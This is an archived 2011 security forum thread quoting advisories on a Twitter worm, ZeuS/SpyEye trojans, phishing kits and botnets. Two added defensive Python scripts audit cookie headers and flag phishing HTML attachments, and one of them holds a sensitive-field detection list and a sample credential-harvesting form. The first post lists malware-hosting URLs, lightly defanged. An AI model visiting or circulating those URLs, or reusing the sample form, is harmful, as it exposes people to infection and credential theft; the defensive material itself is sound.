
Thread: SPAM frauds, fakes, and other MALWARE deliveries - archive

  1. #361
    AplusWebMaster (Adviser Team) - Join Date: Oct 2005 - Location: USA - Posts: 6,881

    Twitter worm out there...

    FYI...

    Twitter worm - out there...
    - http://isc.sans.edu/diary.html?storyid=10297
    Last Updated: 2011-01-20 16:41:39 UTC - "... new twitter worm out there. There is an increased number of messages... Those short URLs point to the servers providing the malware. The following are some of the malicious URLs I could gather (CAREFUL: THEY ARE STILL ACTIVE):
    • http ://cainnoventa .it/m28sx.html
    • http ://servizialcittadino .it/m28sx.html
    • http ://aimos.fr/m28sx .html
    • http ://lowcostcoiffure .fr/m28sx.html
    • http ://s15248477.onlinehome-server .info/m28sx.html
    • http ://www.waseetstore .com/m28sx.html
    • http ://www.gemini .ee/m28sx.html
    After clicking on the URL, you are sent to a fake AV web page..."
    (Screenshots available at the ISC URL above.)
    ___

    - http://www.pcworld.com/article/21730...ware_scam.html
    Jan 21, 2011 "... Del Harvey, head of Twitter's Trust and Safety Team, wrote on her Twitter account that 'we're working to remove the malware links and reset passwords on compromised accounts.' 'Did you follow a goo.gl link that led to a page telling you to install 'Security Shield' Rogue AV?' she wrote. 'That's malware. Don't install'..."

    - http://nakedsecurity.sophos.com/2011...-goo-gl-links/
    January 20, 2011 - "... If you make the mistake of clicking on one of the malicious goo.gl links you are ultimately taken to a website which attempts to scare you into believing that you have a virus problem on your computer. You are then frightened into installing malicious code on your PC, and asked to pay money to disinfect your systems... Ukrainian URL hosting the malware... The natural suspicion would be that their usernames and passwords have been stolen. It certainly would be a sensible precaution for users who have found their Twitter accounts unexpectedly posting goo.gl links to change their passwords immediately..."

    Last edited by AplusWebMaster; 2011-01-22 at 20:01.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #362
    AplusWebMaster (Adviser Team)

    Fraud advisory... Web crawling with new Zbot/Zeus variants...

    FYI...

    Fraud advisory - FBI/iC3: e-mails...
    - http://www.ic3.gov/media/2011/110119.aspx
    January 19, 2011 - "... cyber criminals engaging in ACH/wire transfer fraud have targeted businesses by responding via e-mail to employment opportunities posted online. Recently, more than $150,000 was stolen from a US business via unauthorized wire transfer as a result of an e-mail the business received that contained malware. The malware was embedded in an e-mail response to a job posting the business placed on an employment website and allowed the attacker to obtain the online banking credentials of the person who was authorized to conduct financial transactions within the company. The malicious actor changed the account settings to allow the sending of wire transfers, one to the Ukraine and two to domestic accounts. The malware was identified as a Bredolab variant, svrwsc.exe. This malware was connected to the ZeuS/Zbot Trojan, which is commonly used by cyber criminals to defraud US businesses. The FBI recommends that potential employers remain vigilant in opening the e-mails of prospective employees. Running a virus scan prior to opening any e-mail attachments may provide an added layer of security against this type of attack. The FBI also recommends that businesses use separate computer systems to conduct financial transactions..."
    ___

    Zbot-Zeus variants attack online money transactions...
    - http://www.theregister.co.uk/2011/01...versification/
    21 January 2011 - "... Trusteer has detected 26 different ZeuS configurations targeting online payment provider Money Bookers. Configuration files are a set of instructions on what sites to target for the theft of login credentials, manipulation of HTML pages as presented to users of infected machines and other details. Another 13 variants of ZeuS, the last released only on 16 January, attempt to steal login credentials of Web Money users. Nochex, another online payment provider that specialises in providing payment processing services to small businesses, is the target of 12 different ZeuS configurations. Prepaid card provider netSpend and e-gold, a service abused as a payment clearing house by cybercrooks in the past, are also under attack by ZeuS wielding miscreants... More details... here*."
    * http://www.trusteer.com/blog/zeus-la...ment-providers
    January 20, 2011

    Last edited by AplusWebMaster; 2011-01-21 at 21:09.

  3. #363
    AplusWebMaster (Adviser Team)

    SpyEye/ZeuS toolkit code shows up ...

    FYI...

    SpyEye/ZeuS toolkit code shows up ...
    - http://www.theregister.co.uk/2011/01...e_zeus_merger/
    25 January 2011 - "... first sample of code from the merger of the ZeuS and SpyEye cybercrime Trojan toolkits*... ZeuS has long been the root cause of many instances of banking fraud, while SpyEye is a much newer and even more aggressive addition... The malware-building tool includes options to build-in web injects, screenshot captures as well as hooks for various optional add-ins. Core functionality also includes code designed to evade Trusteer Rapport transactions security software, a security application offered to customers of many banks as a defence against banking Trojans. The latter feature shows that, once again, cybercrooks are attempting to up their game in response to developments by security defenders. Plug-ins include the ability to present users of compromised machines with fake pages and improved attacks against Firefox users... The cybercrime toolkit also includes improved credit-card grabbing functionality... Misdirection and misinformation... among the main tools of the cybercrime trade."
    * http://blog.trendmicro.com/spyeyezeu...-v1-3-05-beta/
    Toolkit detail ...


  4. #364
    AplusWebMaster (Adviser Team)

    One-Kit-Phishes-All ...

    FYI...

    One-Kit-Phishes-All
    - http://community.websense.com/blogs/...phish-kit.aspx
    25 Jan 2011 - "... The attack first imitates the Australian Tax Office (ATO) e-tax refund page, an online system where taxpayers can lodge their annual tax refund requests. The kit readies 7 of the biggest banks of Australia, covering almost all accounts. This kit was hosted on compromised Web sites with deep directories specifically mimicking the ATO Web site. Each bank phishing Web site was then placed... Similar to earlier phishing toolkits, this attack utilizes PHP scripts to retrieve, parse, and send on the compromised account information. The kit was also held on several other compromised Web sites to enable the failover of the attack - given the limited lifecycle of phishing sites, more users fall victim to them in the first 24 hours of the attack. The readiness of this phishing toolkit -exceeds- Rock Phish..."

    ___

    Facebook Tunisia keystroke logger...
    - http://www.theregister.co.uk/2011/01...word_slurping/
    25 January 2011 - "Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government... The rogue JavaScript, which was individually customized to steal passwords for each site, worked when users tried to login without availing themselves of the secure sockets layer protection designed to prevent man-in-the-middle attacks. It was found injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, around the same time that protestors began demanding the ouster of Zine el-Abidine Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago..."
    ___

    Facebook photos lead to malware...
    - http://sunbeltblog.blogspot.com/2011...o-malware.html
    January 25, 2011 - "This latest Facebook scam seems to have been rattling around for a few weeks now, directing you to malware from hacked websites hosting the rogue files. There also appear to be various Facebook application pages offering up the same dubious content. Typically, the scam involves sending messages to Facebook users from compromised accounts... Not a lot of sophistication there, but it doesn’t really take much to get people clicking. Downloading the file and running it will result in you sending your friends more "Foto" related spam and the whole process begins again. Some users report the messages appearing on their walls, while others have screenshots of messages popping up in their chat applications..."
    ___

    Facebook scam: Free cellphone recharge
    - http://sunbeltblog.blogspot.com/2011...-recharge.html
    January 24, 2011


  5. #365
    AplusWebMaster (Adviser Team)

    Carberp malware sniffs out A/V to maximize attack impact

    FYI...

    Carberp malware sniffs out A/V to maximize attack impact
    - http://www.computerworld.com/s/artic..._attack_impact
    January 24, 2011 - "... The authors of the new information-stealing trojan "Carberp" have added a feature that detects which antivirus program is running on victimized PCs, said Aviv Raff, the chief technology officer at Seculert, an Israeli security startup. Raff said the criminals added security software detection to make sure they're spending their money wisely... The test services Raff mentioned are similar to legitimate scanning services such as VirusTotal, which lets users upload suspicious files for scanning by scores of for-a-fee and free antivirus programs. Suspect samples that evade detection are shared with the anti-malware community for use in creating new signatures. But other, less scrupulous services have popped up to serve criminals. These services, which security blogger Brian Krebs reported on as early as December 2009*, do not alert security companies when a new piece of malware is detected. That makes them ideal for hackers to check whether code will be detected before they release it. Raff said hackers pay to run their malware through these gray-market services to check the detection status of their code before they release it... Raff expects that Carberp will follow in the footsteps of the SpyEye and Siberia attack kits, and like them, incorporate links to a scanning service. Last week, Raff published an analysis of Carberp** that described new features other than the antivirus polling, including encryption of all communication with the hacker command-and-control server..."
    * http://krebsonsecurity.com/2009/12/v...virus-authors/

    ** http://blog.seculert.com/2011/01/new...evolution.html


  6. #366
    AplusWebMaster (Adviser Team)

    Facebook - NEW security: Secure Browsing ...

    FYI...

    Facebook - NEW security: Secure Browsing (https)
    - http://techblog.avira.com/2011/01/27...s-security/en/
    "Facebook starts to roll out a new security feature: Secure Browsing (https). It will be available in the options of “Account Security”, below the “Account Settings” page.
    This means that all data sent from and to Facebook will be transferred encrypted over the Internet if possible. Attacks to steal identities (for example in WiFi networks with Firesheep) will be rendered impossible this way...
    Currently the feature seems to struggle with some problems though... some online games in Facebook don’t work properly together with activated Secure Browsing. This should be solved very soon... this is a step in the right direction and every Facebook user should activate that option as soon as it is available..."
    (See screenshots available at the URL above.)

    - http://news.cnet.com/8301-27080_3-20029670-245.html
    January 26, 2011

    - http://www.theregister.co.uk/2011/01/26/facebook_https/
    26 January 2011 - "... The move comes a day after pranksters hacked into the Facebook page of CEO Mark Zuckerberg..."

    - http://community.websense.com/blogs/...-comments.aspx
    26 Jan 2011

    Last edited by AplusWebMaster; 2011-01-31 at 11:06.
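
The Tunisian login-page injection quoted in post #364 and the Facebook Secure Browsing rollout quoted here are two views of the same gap: a logged-in session carried over plain HTTP can be read or tampered with on the wire, which is what Firesheep demonstrated on open WiFi. The Python script below is an added example, not code from this thread or from any of the articles it quotes. It audits one HTTP response's headers for the conditions that make such session theft possible: a session cookie set without the Secure attribute (sent in clear whenever the browser follows an http:// link), no Strict-Transport-Security header (so the browser will follow such links), and a session cookie without HttpOnly (readable by any script injected into the page). The two header sets and the cookie-name heuristic are constructed for the example.

```python
"""Audit HTTP response headers for the transport-security gaps described above.

Added example (not code from the thread or the quoted articles). The sample
header sets and the session-cookie name heuristic are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

# Substrings that suggest a cookie carries a login session (constructed heuristic).
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class CookieReport:
    name: str
    secure: bool        # Secure attribute present: browser sends it only over https://
    httponly: bool      # HttpOnly attribute present: not readable from page JavaScript
    looks_like_session: bool

    def findings(self) -> list[str]:
        out = []
        if self.looks_like_session and not self.secure:
            out.append(f"{self.name}: session cookie without Secure, goes out in clear over "
                       "http:// (the traffic Firesheep sniffed on open WiFi)")
        if self.looks_like_session and not self.httponly:
            out.append(f"{self.name}: session cookie without HttpOnly, readable by injected JavaScript")
        return out


def parse_set_cookie(value: str) -> CookieReport:
    """Parse one Set-Cookie header value: name=value; Attr; Attr=val; ..."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    # Attribute names are case-insensitive; flags like Secure carry no value.
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    lowered = name.lower()
    return CookieReport(
        name=name,
        secure="secure" in attrs,
        httponly="httponly" in attrs,
        looks_like_session=any(hint in lowered for hint in SESSION_NAME_HINTS),
    )


def audit_response(headers: list[tuple[str, str]]) -> list[str]:
    """Return the list of findings for one HTTP response's (name, value) headers."""
    findings = []
    names = {k.lower() for k, _ in headers}
    if "strict-transport-security" not in names:
        findings.append("no Strict-Transport-Security header: the browser will still follow "
                        "http:// links to this site, so any cookie without Secure leaks at least once")
    for key, value in headers:
        if key.lower() == "set-cookie":
            findings.extend(parse_set_cookie(value).findings())
    return findings


# Constructed sample 1: a site that serves logged-in pages over plain HTTP.
HEADERS_BEFORE = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "session_id=3f1a9c; Path=/"),
    ("Set-Cookie", "lang=en; Path=/; Max-Age=31536000"),
]

# Constructed sample 2: the same site after an "always https" rollout.
HEADERS_AFTER = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "session_id=3f1a9c; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "lang=en; Path=/; Max-Age=31536000"),
]

if __name__ == "__main__":
    for label, hdrs in (("before", HEADERS_BEFORE), ("after", HEADERS_AFTER)):
        print(f"== {label} ==")
        for line in audit_response(hdrs) or ["no findings"]:
            print(" -", line)
```

The non-session cookie (`lang`) is deliberately left without Secure in both samples: the script only reports cookies whose name suggests they carry a login, because that is the value an attacker on the same network is after.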

  7. #367
    AplusWebMaster (Adviser Team)

    The Tax Spam Cometh

    FYI...

    The Tax Spam Cometh
    - http://www.pcworld.com/businesscente...am_cometh.html
    Jan 28, 2011 - "It is that time of the year again: time to wait anxiously for W2s and 1099s to arrive, then feverishly compile figures and look for deductions to try and get back as much of your money from the IRS - or Her Majesty's Revenue and Customs (HMRC) - as possible. Do you know what that means? That means it is also time for attackers to capitalize on tax season with malware and phishing scams... Phishing e-mails are circulating, claiming that a miscalculation has been detected and that the recipient is owed a larger refund. Fred Touchette of Appriver* explains the new tax season threat. "The scammers see this as an opportunity to possibly catch some people slipping even though this most recent scam is targeting people who are already expecting a refund. To obtain the increased refund, recipients are directed to open the e-mail file attachment titled "Tax.Refund.New.Message.Alert .HTML." The resulting Web page appears to be the actual HMRC site, but is actually generated locally. The form requests sensitive information such as credit card details and mother's maiden name in order to process the refund..."
    * http://blogs.appriver.com/blog/digit...am-trend-lines

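
What makes the attachment trick above effective is that the fake HMRC page is generated on the recipient's own machine, so there is no phishing URL for a filter or takedown to catch; the form still has to send what is typed somewhere, though, and an HTML file that asks for card or maiden-name details and posts to a remote host is a strong signal on its own. The Python script below is an added example, not code from this thread or from the quoted PCWorld and AppRiver articles. It pulls HTML attachments out of a message with the standard library's email package, parses each one for forms, and flags forms that post off-host or ask for sensitive fields. The sample message, its attachment and the field-name list are constructed; the attachment filename is modelled on the one the article quotes.

```python
"""Flag HTML e-mail attachments that carry a locally rendered credential form.

Added example (not code from the thread or the quoted articles). The sample
message, its attachment and the sensitive field-name list are constructed.
"""
from __future__ import annotations

import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments a tax office would not ask for in an e-mailed form (constructed list).
SENSITIVE_FIELD_HINTS = ("card", "cvv", "pin", "passw", "maiden", "ssn", "nino")


class FormScanner(HTMLParser):
    """Collect every <form> with its action URL and the names of its fields."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: list[dict] = []
        self._current: dict | None = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            if name:
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_html(html_text: str) -> list[str]:
    """Findings for one HTML document: forms that post off-host or ask for secrets."""
    scanner = FormScanner()
    scanner.feed(html_text)
    scanner.close()
    findings = []
    for form in scanner.forms:
        host = urlparse(form["action"]).netloc
        if host:  # a page opened from disk has no legitimate reason to POST to a remote host
            findings.append(f"form posts to external host {host}")
        secrets = [f for f in form["fields"] if any(h in f for h in SENSITIVE_FIELD_HINTS)]
        if secrets:
            findings.append("form collects sensitive fields: " + ", ".join(secrets))
    return findings


def scan_message(raw: bytes) -> dict[str, list[str]]:
    """Map each HTML attachment's filename to its findings (empty dict: nothing to flag)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {}
    for part in msg.walk():
        filename = part.get_filename() or ""
        attached_html = (part.get_content_disposition() == "attachment"
                         and part.get_content_type() == "text/html")
        if filename.lower().endswith((".html", ".htm")) or attached_html:
            report[filename or "(unnamed)"] = scan_html(part.get_content())
    return report


# Constructed attachment: a page that looks official but is rendered from the user's disk.
SAMPLE_HTML = """<html><body>
<h1>Refund miscalculation detected</h1>
<form method="post" action="http://refund-portal.example.invalid/submit.php">
  Name <input name="fullname">
  Card number <input name="cardnumber">
  CVV <input name="cvv">
  Mother's maiden name <input name="mothers_maiden_name">
  <input type="submit" value="Claim refund">
</form></body></html>"""

# Constructed benign attachment: a saved page whose form only drives a local search box.
BENIGN_HTML = '<html><body><form action=""><input name="q"><input type="submit"></form></body></html>'


def build_sample_message() -> bytes:
    """Assemble a constructed phishing-style e-mail with the HTML form attached."""
    msg = EmailMessage()
    msg["From"] = "refunds@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Tax refund: new message alert"
    msg.set_content("A miscalculation was detected. Open the attached form to claim your refund.")
    # Filename modelled on the one quoted in the article; the content is constructed.
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="Tax.Refund.New.Message.Alert.HTML")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, findings in scan_message(build_sample_message()).items():
        print(name)
        for line in findings:
            print(" -", line)
```

Run against a mail spool or gateway quarantine, the `scan_message` result is the kind of signal worth logging per message: an HTML attachment with no form is common and harmless, one with an off-host form asking for card details is not.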

  8. #368
    AplusWebMaster (Adviser Team)

    Waledac [has stolen] almost 500,000 email passwords

    FYI...

    Waledac... [has stolen] almost 500,000 email passwords ...
    - http://www.theregister.co.uk/2011/02...nt_compromise/
    2 February 2011 - "Researchers* have taken a peek inside the recently refurbished Waledac botnet, and what they've found isn't pretty. Waledac, a successor to the once-formidable Storm botnet, has passwords for almost 500,000 POP3 email accounts, allowing spam to be sent through SMTP servers, according to findings published on Tuesday by security firm Last Line*. By hijacking legitimate email servers, the Waledac gang is able to evade IP-based blacklisting techniques that many spam filters use to weed out junk messages. What's more, Waledac controllers are in possession of almost 124,000 FTP credentials. The passwords let them run programs that automatically infect the websites with scripts that -redirect- users to sites that install malware and promote fake pharmaceuticals. Last month, the researchers identified almost 9,500 webpages from 222 sites that carried poisoned links injected by Waledac. The discovery comes a month after a new malware-seeded spam run was spotted. This had all the hallmarks of the Storm botnet... “The Waledac botnet remains just a shadow of its former self for now, but that's likely to change given the number of compromised accounts that the Waledac crew possesses,” the Last Line researchers wrote. In addition to a generous helping of compromised credentials, Waledac also comes with a new command and control system that disseminates a list of router nodes to infected machines."
    * http://blog.tllod.com/2011/02/01/calm-before-the-storm/
    February 1, 2011
    - http://www.shadowserver.org/wiki/pmw...endar/20101230

    - http://www.informationweek.com/share...leID=229200280
    Feb. 2, 2011

    Time for password changes...
    - https://www.microsoft.com/protect/fr...s/checker.aspx

    Last edited by AplusWebMaster; 2011-02-03 at 12:37.

  9. #369
    AplusWebMaster (Adviser Team)

    Exploit rate - 61 percent of new vulnerabilities

    FYI...

    Exploit rate - 61 percent of new vulnerabilities...
    - http://www.darkreading.com/taxonomy/...e/id/229201156
    Feb 03, 2011 - "The number of exploited vulnerabilities jumped dramatically last month, with more than 60 percent of new vulnerabilities being exploited... Exploit activity is typically at a rate of 30 to 40 percent, according to Fortinet's newly released January 2001 Threat Landscape report*. Close to half of "critical" vulnerabilities were exploited by attackers..."
    * http://blog.fortinet.com/january-201...s-another-hit/


  10. #370
    AplusWebMaster (Adviser Team)

    Nasdaq hacked ...

    FYI...

    Nasdaq hacked ...
    - http://online.wsj.com/article/SB1000...ries#printMode
    Feb. 5, 2011 - "Nasdaq acknowledged Saturday it has been the victim of hackers and said it has notified customers about the problem. The statement by Nasdaq OMX Inc. came on the heels of a report in Saturday's Wall Street Journal that said unidentified hackers had repeatedly breached the company's computer network in the past year. In a written statement, the company said during its normal security screening, it discovered "malware" files installed on a part of its network called Directors Desk, a service designed to allow company boards to communicate by securely storing and sharing documents..."

    - http://online.wsj.com/article/SB1000...html#printMode
    Feb. 5, 2011

    Last edited by AplusWebMaster; 2011-02-06 at 21:15.
